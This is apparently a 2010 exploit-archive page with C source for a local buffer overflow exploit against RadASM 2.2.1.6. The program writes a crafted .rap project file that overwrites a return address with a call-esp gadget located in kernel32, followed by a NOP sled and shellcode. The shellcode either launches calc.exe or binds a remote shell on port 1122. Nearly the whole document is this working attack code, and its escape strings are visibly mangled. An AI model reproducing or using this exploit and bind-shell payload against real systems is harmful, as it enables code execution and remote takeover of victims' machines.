[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Radasm .rap file local buffer overflow vulnerability
# Published : 2010-02-11
# Author : fl0 fl0w
# Previous Title : CastRipper 2.50.70 (.pls) Stack buffer Overflow Exploit WinXP SP3
# Next Title : WM Downloader v3.0.0.9 PLS PLA Exploit (WinXP SP3)
#include<stdio.h>
#include<windows.h>
#include<getopt.h>
void gen_random(char*,const int);
void print(char*);
unsigned int getFsize(FILE*,char*);
void buildfile(char*);
int make_bindshell(unsigned short);
void help();
void printshell();
DWORD SearchStream(const char *,size_t,const char *,size_t);
DWORD GetNtosDelta (VOID);
DWORD GetOSVersion (VOID);
DWORD FindRetToEspAddress(VOID);
#define VULNF "ufwew.rap"
#define VER "2.2.1.6"
#define POCNAME "Radasm .rap file local buffer overflow exploit"
#define AUTHOR "fl0 fl0w"
#define IF(x,NULL) if(x==NULL)
#define FOR(i,a,b) for(i=a;i<b;++i)
#define EIPOFFSET 0xDD
#define NOP "x90x90x90x90x90"
"x90x90x90x90x90"
#define NUL '�'
#define CLEAR(x) free(x)
#define WXP_DELTA 0xA67FF;
#define W2K_DELTA 0x0;
#define W2K3_DELTA 0x0;
#define WVISTA_DELTA 0x0;
char file[]={ //1534 bytes
0x5B, 0x50, 0x72, 0x6F, 0x6A, 0x65, 0x63, 0x74, 0x5D, 0x0D, 0x0D, 0x0A, 0x41, 0x73, 0x73, 0x65,
0x6D, 0x62, 0x6C, 0x65, 0x72, 0x3D, 0x6D, 0x61, 0x73, 0x6D, 0x0D, 0x0D, 0x0A, 0x47, 0x72, 0x6F,
0x75, 0x70, 0x3D, 0x31, 0x0D, 0x0D, 0x0A, 0x47, 0x72, 0x6F, 0x75, 0x70, 0x45, 0x78, 0x70, 0x61,
0x6E, 0x64, 0x3D, 0x31, 0x0D, 0x0D, 0x0A, 0x5B, 0x46, 0x69, 0x6C, 0x65, 0x73, 0x5D, 0x0D, 0x0D,
0x0A, 0x31, 0x3D, 0x41, 0x56, 0x50, 0x20, 0x4F, 0x76, 0x65, 0x72, 0x66, 0x72, 0x41, 0x51, 0x42,
0x63, 0x38, 0x57, 0x73, 0x61, 0x31, 0x78, 0x56, 0x50, 0x66, 0x76, 0x4A, 0x63, 0x72, 0x67, 0x52,
0x59, 0x77, 0x54, 0x69, 0x69, 0x7A, 0x73, 0x32, 0x74, 0x72, 0x51, 0x46, 0x36, 0x39, 0x41, 0x7A,
0x42, 0x6C, 0x61, 0x78, 0x33, 0x43, 0x46, 0x33, 0x45, 0x44, 0x4E, 0x68, 0x6D, 0x33, 0x73, 0x6F,
0x4C, 0x42, 0x50, 0x68, 0x37, 0x31, 0x59, 0x65, 0x78, 0x75, 0x69, 0x65, 0x61, 0x6F, 0x45, 0x69,
0x49, 0x67, 0x78, 0x49, 0x58, 0x34, 0x61, 0x32, 0x64, 0x52, 0x45, 0x62, 0x62, 0x53, 0x71, 0x57,
0x79, 0x36, 0x79, 0x68, 0x4B, 0x49, 0x44, 0x43, 0x64, 0x4A, 0x4F, 0x79, 0x61, 0x70, 0x6E, 0x78,
0x72, 0x70, 0x4D, 0x43, 0x41, 0x52, 0x43, 0x72, 0x34, 0x7A, 0x64, 0x47, 0x63, 0x38, 0x31, 0x74,
0x42, 0x44, 0x4B, 0x73, 0x4D, 0x6C, 0x61, 0x5A, 0x54, 0x58, 0x43, 0x31, 0x4F, 0x38, 0x59, 0x46,
0x4F, 0x47, 0x4B, 0x6A, 0x78, 0x52, 0x72, 0x4A, 0x42, 0x64, 0x54, 0x33, 0x68, 0x56, 0x4F, 0x66,
0x6F, 0x61, 0x4D, 0x65, 0x41, 0x6A, 0x53, 0x57, 0x66, 0x63, 0x68, 0x6F, 0x5A, 0x59, 0x46, 0x59,
0x5A, 0x35, 0x42, 0x36, 0x6B, 0x7A, 0x4D, 0x43, 0x6B, 0x38, 0x52, 0x36, 0x42, 0x45, 0x75, 0x5A,
0x4D, 0x72, 0x46, 0x36, 0x63, 0x49, 0x36, 0x4E, 0x58, 0x38, 0x44, 0x59, 0x64, 0x44, 0x33, 0x6F,
0x6A, 0x78, 0x53, 0x6E, 0x71, 0x50, 0x54, 0x47, 0x66, 0x52, 0x79, 0x69, 0x6C, 0x4F, 0x59, 0x47,
0x78, 0x6C, 0x53, 0x58, 0x50, 0x74, 0x4C, 0x4A, 0x62, 0x6F, 0x48, 0x38, 0x53, 0x34, 0x6B, 0x77,
0x49, 0x67, 0x54, 0x78, 0x42, 0x42, 0x42, 0x42, 0x41, 0x41, 0x41, 0x41, 0x7A, 0x4F, 0x4C, 0x4D,
0x72, 0x62, 0x41, 0x79, 0x66, 0x4B, 0x55, 0x55, 0x54, 0x73, 0x47, 0x43, 0x6F, 0x52, 0x62, 0x6C,
0x73, 0x61, 0x71, 0x76, 0x36, 0x55, 0x70, 0x64, 0x76, 0x4E, 0x49, 0x73, 0x4E, 0x72, 0x6D, 0x77,
0x55, 0x6C, 0x4E, 0x35, 0x75, 0x39, 0x74, 0x33, 0x74, 0x67, 0x6A, 0x32, 0x74, 0x75, 0x73, 0x5A,
0x42, 0x61, 0x75, 0x46, 0x6B, 0x72, 0x46, 0x43, 0x4A, 0x43, 0x6D, 0x5A, 0x46, 0x4F, 0x76, 0x31,
0x51, 0x44, 0x49, 0x49, 0x58, 0x4A, 0x4E, 0x5A, 0x49, 0x39, 0x35, 0x68, 0x46, 0x51, 0x72, 0x37,
0x37, 0x42, 0x49, 0x45, 0x6C, 0x79, 0x63, 0x74, 0x34, 0x41, 0x6A, 0x36, 0x50, 0x4B, 0x6E, 0x5A,
0x70, 0x7A, 0x52, 0x69, 0x4B, 0x59, 0x70, 0x5A, 0x67, 0x6E, 0x53, 0x4F, 0x4B, 0x6C, 0x71, 0x38,
0x41, 0x7A, 0x72, 0x48, 0x71, 0x44, 0x6F, 0x47, 0x4C, 0x34, 0x52, 0x48, 0x79, 0x71, 0x79, 0x58,
0x33, 0x67, 0x35, 0x41, 0x79, 0x79, 0x36, 0x31, 0x6C, 0x65, 0x44, 0x59, 0x54, 0x33, 0x43, 0x45,
0x57, 0x38, 0x4B, 0x36, 0x39, 0x72, 0x6B, 0x6C, 0x50, 0x47, 0x74, 0x66, 0x55, 0x52, 0x32, 0x49,
0x5A, 0x32, 0x6D, 0x42, 0x31, 0x53, 0x37, 0x4E, 0x4C, 0x74, 0x32, 0x6E, 0x51, 0x66, 0x6A, 0x33,
0x53, 0x4C, 0x33, 0x58, 0x42, 0x79, 0x49, 0x6D, 0x63, 0x69, 0x51, 0x54, 0x71, 0x56, 0x61, 0x41,
0x55, 0x6E, 0x4A, 0x76, 0x55, 0x6D, 0x48, 0x56, 0x51, 0x47, 0x73, 0x54, 0x6D, 0x76, 0x48, 0x65,
0x75, 0x53, 0x45, 0x42, 0x4D, 0x53, 0x50, 0x68, 0x32, 0x51, 0x36, 0x64, 0x51, 0x41, 0x6A, 0x79,
0x34, 0x4B, 0x6A, 0x73, 0x66, 0x53, 0x58, 0x46, 0x34, 0x59, 0x50, 0x38, 0x61, 0x72, 0x46, 0x33,
0x53, 0x4C, 0x4C, 0x6E, 0x79, 0x33, 0x30, 0x4B, 0x4B, 0x7A, 0x69, 0x48, 0x74, 0x52, 0x62, 0x4F,
0x45, 0x32, 0x75, 0x38, 0x71, 0x76, 0x4A, 0x50, 0x33, 0x42, 0x36, 0x55, 0x69, 0x75, 0x31, 0x67,
0x4A, 0x30, 0x33, 0x4F, 0x68, 0x6D, 0x57, 0x76, 0x6E, 0x37, 0x4D, 0x49, 0x72, 0x39, 0x6F, 0x44,
0x55, 0x54, 0x4F, 0x58, 0x37, 0x4E, 0x59, 0x45, 0x6B, 0x5A, 0x67, 0x7A, 0x55, 0x6E, 0x79, 0x31,
0x73, 0x77, 0x4F, 0x62, 0x64, 0x59, 0x53, 0x45, 0x76, 0x57, 0x52, 0x42, 0x4C, 0x7A, 0x5A, 0x30,
0x32, 0x68, 0x36, 0x37, 0x59, 0x72, 0x6C, 0x76, 0x42, 0x6E, 0x64, 0x6E, 0x34, 0x63, 0x58, 0x50,
0x61, 0x6F, 0x61, 0x4B, 0x6B, 0x35, 0x6C, 0x51, 0x6E, 0x33, 0x33, 0x68, 0x66, 0x4E, 0x57, 0x50,
0x67, 0x72, 0x38, 0x38, 0x31, 0x6E, 0x50, 0x37, 0x56, 0x78, 0x45, 0x45, 0x34, 0x46, 0x64, 0x67,
0x63, 0x4C, 0x39, 0x66, 0x4F, 0x50, 0x79, 0x63, 0x39, 0x38, 0x62, 0x49, 0x38, 0x39, 0x71, 0x54,
0x50, 0x46, 0x74, 0x79, 0x73, 0x4C, 0x31, 0x51, 0x34, 0x47, 0x54, 0x4F, 0x50, 0x77, 0x44, 0x37,
0x6B, 0x6B, 0x71, 0x50, 0x71, 0x51, 0x35, 0x50, 0x4E, 0x45, 0x45, 0x66, 0x75, 0x54, 0x6C, 0x43,
0x48, 0x39, 0x57, 0x70, 0x49, 0x59, 0x61, 0x50, 0x48, 0x57, 0x66, 0x55, 0x54, 0x6A, 0x6C, 0x54,
0x4F, 0x53, 0x6A, 0x33, 0x69, 0x48, 0x37, 0x4A, 0x54, 0x52, 0x73, 0x62, 0x59, 0x48, 0x31, 0x33,
0x33, 0x54, 0x79, 0x57, 0x4C, 0x49, 0x42, 0x34, 0x47, 0x33, 0x73, 0x56, 0x30, 0x79, 0x6B, 0x50,
0x64, 0x73, 0x37, 0x48, 0x58, 0x32, 0x37, 0x4B, 0x62, 0x4E, 0x43, 0x43, 0x79, 0x74, 0x4A, 0x52,
0x38, 0x43, 0x75, 0x36, 0x58, 0x46, 0x70, 0x74, 0x45, 0x49, 0x50, 0x36, 0x38, 0x76, 0x38, 0x5A,
0x64, 0x56, 0x36, 0x30, 0x47, 0x58, 0x41, 0x50, 0x5A, 0x48, 0x41, 0x44, 0x32, 0x76, 0x51, 0x6B,
0x57, 0x72, 0x70, 0x71, 0x69, 0x77, 0x64, 0x6F, 0x33, 0x48, 0x72, 0x64, 0x74, 0x36, 0x7A, 0x33,
0x6C, 0x53, 0x54, 0x70, 0x67, 0x54, 0x70, 0x52, 0x70, 0x52, 0x56, 0x63, 0x77, 0x6F, 0x36, 0x48,
0x4D, 0x38, 0x75, 0x41, 0x38, 0x44, 0x39, 0x65, 0x45, 0x34, 0x5A, 0x41, 0x44, 0x74, 0x6D, 0x76,
0x57, 0x76, 0x4E, 0x32, 0x30, 0x4C, 0x42, 0x48, 0x53, 0x6B, 0x44, 0x36, 0x71, 0x72, 0x37, 0x4A,
0x31, 0x68, 0x41, 0x6B, 0x54, 0x6B, 0x55, 0x46, 0x76, 0x4D, 0x41, 0x30, 0x4F, 0x53, 0x61, 0x39,
0x31, 0x65, 0x39, 0x67, 0x71, 0x56, 0x4E, 0x42, 0x65, 0x67, 0x31, 0x30, 0x67, 0x41, 0x49, 0x34,
0x4F, 0x4D, 0x72, 0x78, 0x46, 0x32, 0x6C, 0x74, 0x52, 0x50, 0x57, 0x61, 0x63, 0x4B, 0x77, 0x68,
0x7A, 0x51, 0x79, 0x77, 0x38, 0x62, 0x79, 0x78, 0x49, 0x46, 0x77, 0x4F, 0x51, 0x66, 0x78, 0x46,
0x59, 0x79, 0x30, 0x71, 0x75, 0x75, 0x62, 0x70, 0x43, 0x7A, 0x49, 0x37, 0x31, 0x4D, 0x52, 0x56,
0x4F, 0x67, 0x44, 0x6B, 0x6F, 0x38, 0x66, 0x6E, 0x50, 0x59, 0x6C, 0x61, 0x70, 0x64, 0x76, 0x78,
0x6C, 0x55, 0x73, 0x42, 0x48, 0x32, 0x39, 0x43, 0x6D, 0x33, 0x4F, 0x52, 0x59, 0x6B, 0x66, 0x72,
0x6A, 0x52, 0x5A, 0x44, 0x64, 0x77, 0x36, 0x4C, 0x63, 0x70, 0x58, 0x33, 0x33, 0x65, 0x31, 0x49,
0x4F, 0x77, 0x57, 0x52, 0x32, 0x75, 0x61, 0x41, 0x74, 0x5A, 0x56, 0x42, 0x35, 0x79, 0x69, 0x39,
0x69, 0x6A, 0x53, 0x41, 0x6A, 0x42, 0x51, 0x6A, 0x67, 0x6E, 0x5A, 0x53, 0x43, 0x65, 0x38, 0x6E,
0x50, 0x51, 0x48, 0x6E, 0x70, 0x70, 0x5A, 0x71, 0x74, 0x34, 0x35, 0x36, 0x75, 0x4E, 0x68, 0x61,
0x41, 0x41, 0x5A, 0x2E, 0x41, 0x73, 0x6D, 0x0D, 0x0D, 0x0A, 0x32, 0x3D, 0x41, 0x56, 0x50, 0x20,
0x4F, 0x76, 0x65, 0x72, 0x2E, 0x49, 0x6E, 0x63, 0x0D, 0x0D, 0x0A, 0x5B, 0x4D, 0x61, 0x6B, 0x65,
0x46, 0x69, 0x6C, 0x65, 0x73, 0x5D, 0x0D, 0x0D, 0x0A, 0x30, 0x3D, 0x41, 0x56, 0x50, 0x20, 0x4F,
0x76, 0x65, 0x72, 0x2E, 0x72, 0x65, 0x73, 0x0D, 0x0D, 0x0A, 0x5B, 0x4D, 0x61, 0x6B, 0x65, 0x44,
0x65, 0x66, 0x5D, 0x0D, 0x0D, 0x0A, 0x4D, 0x65, 0x6E, 0x75, 0x3D, 0x30, 0x2C, 0x31, 0x2C, 0x31,
0x2C, 0x31, 0x2C, 0x31, 0x2C, 0x31, 0x2C, 0x31, 0x2C, 0x30, 0x2C, 0x30, 0x2C, 0x30, 0x2C, 0x30,
0x2C, 0x30, 0x2C, 0x30, 0x2C, 0x30, 0x2C, 0x30, 0x2C, 0x30, 0x0D, 0x0D, 0x0A, 0x31, 0x3D, 0x34,
0x2C, 0x4F, 0x2C, 0x24, 0x42, 0x5C, 0x52, 0x43, 0x2E, 0x45, 0x58, 0x45, 0x20, 0x2F, 0x76, 0x2C,
0x31, 0x0D, 0x0D, 0x0A, 0x32, 0x3D, 0x33, 0x2C, 0x4F, 0x2C, 0x24, 0x42, 0x5C, 0x4D, 0x4C, 0x2E,
0x45, 0x58, 0x45, 0x20, 0x2F, 0x63, 0x20, 0x2F, 0x63, 0x6F, 0x66, 0x66, 0x20, 0x2F, 0x43, 0x70,
0x20, 0x2F, 0x6E, 0x6F, 0x36, 0x43, 0x6F, 0x67, 0x6F, 0x20, 0x2F, 0x49, 0x22, 0x24, 0x49, 0x22,
0x2C, 0x32, 0x0D, 0x0D, 0x0A, 0x33, 0x3D, 0x35, 0x2C, 0x4F, 0x2C, 0x24, 0x42, 0x5C, 0x4C, 0x49,
0x4E, 0x4B, 0x2E, 0x45, 0x58, 0x45, 0x20, 0x2F, 0x53, 0x55, 0x42, 0x53, 0x59, 0x53, 0x54, 0x45,
0x4D, 0x3A, 0x57, 0x49, 0x4E, 0x44, 0x4F, 0x57, 0x53, 0x20, 0x2F, 0x52, 0x45, 0x4C, 0x45, 0x41,
0x53, 0x45, 0x20, 0x2F, 0x56, 0x45, 0x52, 0x53, 0x49, 0x4F, 0x4E, 0x3A, 0x34, 0x2E, 0x30, 0x20,
0x2F, 0x4C, 0x49, 0x42, 0x50, 0x41, 0x54, 0x48, 0x3A, 0x22, 0x24, 0x4C, 0x22, 0x20, 0x2F, 0x4F,
0x55, 0x54, 0x3A, 0x22, 0x24, 0x35, 0x22, 0x2C, 0x33, 0x0D, 0x0D, 0x0A, 0x34, 0x3D, 0x30, 0x2C,
0x30, 0x2C, 0x2C, 0x35, 0x0D, 0x0D, 0x0A, 0x35, 0x3D, 0x72, 0x73, 0x72, 0x63, 0x2E, 0x6F, 0x62,
0x6A, 0x2C, 0x4F, 0x2C, 0x24, 0x42, 0x5C, 0x43, 0x56, 0x54, 0x52, 0x45, 0x53, 0x2E, 0x45, 0x58,
0x45, 0x2C, 0x72, 0x73, 0x72, 0x63, 0x2E, 0x72, 0x65, 0x73, 0x0D, 0x0D, 0x0A, 0x36, 0x3D, 0x2A,
0x2E, 0x6F, 0x62, 0x6A, 0x2C, 0x4F, 0x2C, 0x24, 0x42, 0x5C, 0x4D, 0x4C, 0x2E, 0x45, 0x58, 0x45,
0x20, 0x2F, 0x63, 0x20, 0x2F, 0x63, 0x6F, 0x66, 0x66, 0x20, 0x2F, 0x43, 0x70, 0x20, 0x2F, 0x6E,
0x6F, 0x6C, 0x6F, 0x67, 0x6F, 0x20, 0x2F, 0x49, 0x22, 0x24, 0x49, 0x22, 0x2C, 0x2A, 0x2E, 0x61,
0x73, 0x6D, 0x0D, 0x0D, 0x0A, 0x37, 0x3D, 0x30, 0x2C, 0x30, 0x2C, 0x22, 0x24, 0x45, 0x5C, 0x4F,
0x6C, 0x6C, 0x79, 0x44, 0x62, 0x67, 0x22, 0x2C, 0x35, 0x0D, 0x0D, 0x0A, 0x5B, 0x47, 0x72, 0x6F,
0x75, 0x70, 0x5D, 0x0D, 0x0D, 0x0A, 0x47, 0x72, 0x6F, 0x75, 0x70, 0x3D, 0x41, 0x64, 0x64, 0x65,
0x64, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x73, 0x2C, 0x41, 0x73, 0x73, 0x65, 0x6D, 0x62, 0x6C, 0x79,
0x2C, 0x52, 0x65, 0x73, 0x6F, 0x75, 0x72, 0x63, 0x65, 0x73, 0x2C, 0x4D, 0x69, 0x73, 0x63, 0x2C,
0x4D, 0x6F, 0x64, 0x75, 0x6C, 0x65, 0x73, 0x0D, 0x0A, 0x31, 0x3D, 0x31, 0x0D, 0x0A,};
DWORD g_dwOsVersion = 0;
LPVOID g_PatchAddress = NULL;
typedef BOOL(WINAPI *PENUMDEVICES)(LPVOID*,DWORD ,LPDWORD);
typedef DWORD(WINAPI *PGETDEVNAME)(LPVOID ImageBase,char *lpBaseName,DWORD nSize);
typedef DWORD (WINAPI* PQUERYSYSTEM)(UINT, PVOID, DWORD,PDWORD);
enum OSes
{
OS_WXP=1,
OS_W2K,
OS_W2K3,
OS_VISTA
};
typedef enum{
True=1,
False=0,
Error=-1
}boolean;
struct{
char* sname;
int sz;
char* shell;
}use[]={
{"calc.exe",338,
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x49x49x49x49x49x49x49x49x49x49x51x5ax37x6ax63"
"x58x30x42x30x50x42x6bx42x41x73x41x42x32x42x41x32"
"x41x41x30x41x41x58x38x42x42x50x75x38x69x69x6cx38"
"x68x41x54x77x70x57x70x75x50x6ex6bx41x55x55x6cx6e"
"x6bx43x4cx66x65x41x68x45x51x58x6fx4cx4bx50x4fx62"
"x38x6ex6bx41x4fx31x30x36x61x4ax4bx41x59x6cx4bx74"
"x74x6ex6bx44x41x4ax4ex47x41x4bx70x6fx69x6cx6cx4c"
"x44x4bx70x43x44x76x67x4bx71x4ax6ax66x6dx66x61x39"
"x52x5ax4bx4ax54x75x6bx62x74x56x44x73x34x41x65x4b"
"x55x4ex6bx73x6fx54x64x53x31x6ax4bx35x36x6cx4bx64"
"x4cx30x4bx6cx4bx73x6fx57x6cx75x51x6ax4bx6cx4bx37"
"x6cx6cx4bx77x71x68x6bx4cx49x71x4cx51x34x43x34x6b"
"x73x46x51x79x50x71x74x4cx4bx67x30x36x50x4cx45x4b"
"x70x62x58x74x4cx6cx4bx53x70x56x6cx4ex6bx34x30x47"
"x6cx4ex4dx6cx4bx70x68x37x78x58x6bx53x39x6cx4bx4f"
"x70x6cx70x53x30x43x30x73x30x6cx4bx42x48x77x4cx61"
"x4fx44x71x6bx46x73x50x72x76x6bx39x5ax58x6fx73x4f"
"x30x73x4bx56x30x31x78x61x6ex6ax78x4bx52x74x33x55"
"x38x4ax38x69x6ex6cx4ax54x4ex52x77x79x6fx79x77x42"
"x43x50x61x70x6cx41x73x64x6ex51x75x52x58x31x75x57x70x63"},
{
"Bind port 1122",709,
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx56x4bx4e"
"x4dx54x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x46x4bx48"
"x4ex36x46x52x46x32x4bx38x45x54x4ex53x4bx38x4ex37"
"x45x30x4ax57x41x30x4fx4ex4bx58x4fx54x4ax31x4bx48"
"x4fx35x42x52x41x30x4bx4ex49x34x4bx38x46x43x4bx48"
"x41x30x50x4ex41x33x42x4cx49x49x4ex4ax46x58x42x4c"
"x46x57x47x50x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e"
"x46x4fx4bx33x46x45x46x32x4ax32x45x37x45x4ex4bx48"
"x4fx55x46x32x41x50x4bx4ex48x56x4bx48x4ex50x4bx44"
"x4bx58x4fx45x4ex31x41x30x4bx4ex43x30x4ex32x4bx58"
"x49x38x4ex36x46x52x4ex41x41x56x43x4cx41x33x4bx4d"
"x46x56x4bx38x43x34x42x53x4bx38x42x44x4ex30x4bx48"
"x42x47x4ex51x4dx4ax4bx58x42x34x4ax30x50x45x4ax46"
"x50x38x50x44x50x30x4ex4ex42x55x4fx4fx48x4dx48x56"
"x43x55x48x36x4ax36x43x33x44x33x4ax46x47x57x43x57"
"x44x43x4fx45x46x35x4fx4fx42x4dx4ax46x4bx4cx4dx4e"
"x4ex4fx4bx43x42x45x4fx4fx48x4dx4fx55x49x58x45x4e"
"x48x46x41x38x4dx4ex4ax50x44x50x45x35x4cx56x44x30"
"x4fx4fx42x4dx4ax36x49x4dx49x50x45x4fx4dx4ax47x55"
"x4fx4fx48x4dx43x55x43x45x43x45x43x35x43x35x43x44"
"x43x35x43x34x43x45x4fx4fx42x4dx48x36x4ax36x46x50"
"x44x36x48x36x43x35x49x38x41x4ex45x49x4ax36x46x4a"
"x4cx51x42x47x47x4cx47x45x4fx4fx48x4dx4cx46x42x31"
"x41x55x45x35x4fx4fx42x4dx4ax36x46x4ax4dx4ax50x42"
"x49x4ex47x45x4fx4fx48x4dx43x55x45x45x4fx4fx42x4d"
"x4ax36x45x4ex49x44x48x58x49x54x47x55x4fx4fx48x4d"
"x42x55x46x35x46x45x45x45x4fx4fx42x4dx43x49x4ax46"
"x47x4ex49x47x48x4cx49x37x47x55x4fx4fx48x4dx45x35"
"x4fx4fx42x4dx48x46x4cx46x46x46x48x36x4ax46x43x56"
"x4dx36x49x38x45x4ex4cx36x42x35x49x45x49x32x4ex4c"
"x49x38x47x4ex4cx56x46x34x49x58x44x4ex41x43x42x4c"
"x43x4fx4cx4ax50x4fx44x44x4dx52x50x4fx44x54x4ex52"
"x43x39x4dx58x4cx57x4ax53x4bx4ax4bx4ax4bx4ax4ax56"
"x44x57x50x4fx43x4bx48x51x4fx4fx45x57x46x34x4fx4f"
"x48x4dx4bx45x47x55x44x45x41x45x41x35x41x45x4cx56"
"x41x50x41x45x41x55x45x55x41x55x4fx4fx42x4dx4ax36"
"x4dx4ax49x4dx45x30x50x4cx43x45x4fx4fx48x4dx4cx36"
"x4fx4fx4fx4fx47x53x4fx4fx42x4dx4bx58x47x35x4ex4f"
"x43x58x46x4cx46x36x4fx4fx48x4dx44x55x4fx4fx42x4d"
"x4ax56x42x4fx4cx38x46x30x4fx35x43x35x4fx4fx48x4d"
"x4fx4fx42x4dx5a"
},
{NUL,NUL}
};
struct{
unsigned int code;
}usez;
DWORD ret;
int S;
int main(int argc,char* argv[]){
ret=FindRetToEspAddress();//default eip
if(argc<2){
system("cls");
help();
GetNtosDelta();
printshell();
printf("[^]The default retcode is :0x%X",ret);
exit(0);}
printf("[!]%sn[!]%sn[!]By %sn",POCNAME,VER,AUTHOR);
int opt;
while((opt=getopt(argc,argv,"s:t"))!=-1){
switch(opt){
case 's':
S=atoi(optarg);
break;
case 't':
sscanf(argv[4],"%x",&ret);
break;
default:
help();
}}
buildfile(VULNF);
printf("[#]You selected: %sn",use[S].sname);
print("DONE!");
getchar();
return 0;
}
void buildfile(char* fname){
char buffer[100000];
gen_random(buffer,5000);
memcpy(buffer,file,strlen(file));
memcpy(buffer+292,&ret,4);
memcpy(buffer+312,NOP,10);
memcpy(buffer+322,use[S].shell,strlen(use[S].shell));
printf("[#]Your Retcode is: 0x%Xn",ret);
FILE* f=fopen(fname,"wb");
if(f){
fwrite(buffer,1,1534,f);
fclose(f);
}
else {
print("Error in writing file");
exit(0);
}
free(buffer);
free(file);
int sz=getFsize(f,fname);
printf("[!]File is %d bytesn",sz);
}
void help()
{ char h[]="************************************************n"
"*Radasm .rap file local buffer overflow exploit*n"
"*syntax: [-h<shellcode>] [-t<your target>] *n"
"* -s shellcode to run 0 or 1 *n"
"* -t your target *n"
"* example: radasm.exe -s 0 -t 0xFFFFFFFF *n"
"* If you want a retcode default from your *n"
"* memory don't use -t option *n"
"************************************************n";
printf("%s",h);}
void printshell()
{ print("We can use:");
int i;
FOR(i,0,2){
printf("[!] %d. %s of size: %d bytesn",i,use[i].sname,strlen(use[i].shell)); }
}
DWORD GetOSVersion (VOID)
{
OSVERSIONINFOA osvi;
DWORD retval = 0;
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOA);
if(GetVersionExA(&osvi))
{ if(osvi.dwMajorVersion==5)
{
switch(osvi.dwMinorVersion)
{
case 0:
retval=OS_W2K;
break;
case 1:
retval=OS_WXP;
break;
case 2:
retval=OS_W2K3;
break;
}
}
else if(osvi.dwMajorVersion==6)
{retval=OS_VISTA;
}
}
g_dwOsVersion=retval;
return retval;
}
DWORD GetNtosDelta (VOID)
{ DWORD retval = 0;
switch(GetOSVersion())
{
case OS_VISTA:
print("System identified as Windows Vistan");
retval=WVISTA_DELTA;
break;
case OS_W2K:
print("System identified as Windows 2000n");
retval=W2K_DELTA;
break;
case OS_W2K3:
print("System identified as Windows 2003n");
retval=W2K3_DELTA;
break;
case OS_WXP:
print("System identified as Windows XPn");
retval=WXP_DELTA;
break;
default:
print("Unidentified system!n");
}
return retval;
}
DWORD SearchStream(
const char *pvStream,
size_t uStreamSize,
const char *pvSubStream,
size_t uSubStreamSize)
{unsigned int uCount = 0,i,j;
while( (uStreamSize) > (uCount) ) {
for(i=0;i<=(uSubStreamSize-1);i++) {
if(*pvStream != pvSubStream[i]) {
*pvStream++;
if( i>0 ) {
for(j=0;j<i;j++)
*pvStream--;
}
break;
}
if(i==(uSubStreamSize-1))
return(uCount);
*pvStream++;
}
uCount++;
}
return -1;
}
DWORD FindRetToEspAddress(VOID)
{HMODULE hModule = GetModuleHandle("kernel32.dll");
DWORD dwEspRet;
char* pszCallEsp = "xFFxD4";
PIMAGE_DOS_HEADER pimage_dos_header;
PIMAGE_NT_HEADERS pimage_nt_headers;
pimage_dos_header = (PIMAGE_DOS_HEADER)hModule;
pimage_nt_headers = (PIMAGE_NT_HEADERS)((DWORD)hModule+pimage_dos_header->e_lfanew);
dwEspRet = SearchStream((char*)hModule,pimage_nt_headers->OptionalHeader.SizeOfImage,pszCallEsp,sizeof(WORD));
return (dwEspRet += (DWORD)hModule);
}
unsigned int getFsize(FILE* g,char* gname)
{unsigned int s;
g=fopen(gname,"rb");
IF(g,NULL)
{
print("File error at reading");
exit(0);
}
fseek(g,0,SEEK_END);
s=ftell(g);
return s;}
void print(char* msg)
{
printf("[*]%sn",msg);
}
void gen_random(char *s, const int len)
{ int i; //helps u find the offsets
static const char alphanum[] ="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
FOR(i,0,len)
{
s[i]=alphanum[rand()%(sizeof(alphanum)-1)];
}
s[len]=0;
}